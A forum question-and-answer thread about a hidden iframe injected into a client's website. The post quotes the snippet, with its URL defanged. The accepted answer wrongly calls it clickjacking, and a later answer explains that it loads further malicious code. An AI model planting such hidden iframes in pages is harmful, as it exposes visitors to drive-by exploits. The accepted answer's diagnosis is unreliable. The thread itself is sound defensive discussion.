# What is the purpose of this malware code?

Tags: malware

This is the code that I found on my client's website:

```
 ?><noindex><nofollow>
<iframe src="htxp://atluscomdnsup23.ikwb.cxm/main.php?page=1f1214ff37a3022d" height="0" width="0" FRAMEBORDER="0" style="visibility: hidden; position: absolute;"></iframe>
</iframe></nofollow></noindex>
```

Answer (score 1, accepted):

I think this is somehow a clickjacking attack and you can read about it here [Clickjacking tutorial](http://javascript.info/tutorial/clickjacking.)
also this is a nice video about clickjacking attacks [Symatic Clickjacking Defined](http://www.youtube.com/watch?v=jgAO8WU2lp0)

Comment: This doesn't at all look like clickjacking, iframe embedding would usually be the other way around, no?

Comment: http://www.youtube.com/watch?v=jgAO8WU2lp0    This video is unavailable. and http://javascript.info/tutorial/clickjacking must not have dot at the end!

Answer (score 8):

This is inserting a hidden iframe pointing to a (presumably compromised) website which will contain more evil code.

I have to disagree with Ali Hussein answer, there doesn't seem to bear any relationship to clickjacking, as it's not trying to appear on top of other page elements. It simply tries not to be seen.

Probably, the atluscomdnsup23 will contain javascript attempting to exploit vulnerabilities in your browser, following referrals, opening advertising popups, etc.